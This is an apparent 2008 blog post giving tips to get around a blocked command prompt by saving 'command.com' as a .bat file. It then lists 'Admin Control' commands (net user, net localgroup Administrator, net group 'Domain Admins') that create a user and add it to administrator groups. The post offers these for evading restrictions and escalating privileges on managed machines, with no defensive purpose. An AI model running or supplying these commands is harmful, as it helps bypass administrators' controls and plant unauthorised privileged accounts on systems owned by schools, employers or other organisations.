Wednesday, May 28, 2008

How to access cmd if it is blocked!


1-Open notepad

2-Type "command.com" in the text file

3- Save the file as command.bat( or whatever you want, as long as it ends in .bat.)

Additional Tips


Admin Control-
net user YOURUSER YOURPASS /add >> Add_admin.txt
net localgroup Administrator YOURUSER /add >> Add_admin.txt
net group "Domain Admins" YOURUSER /add >> Add_admin.txt

No comments: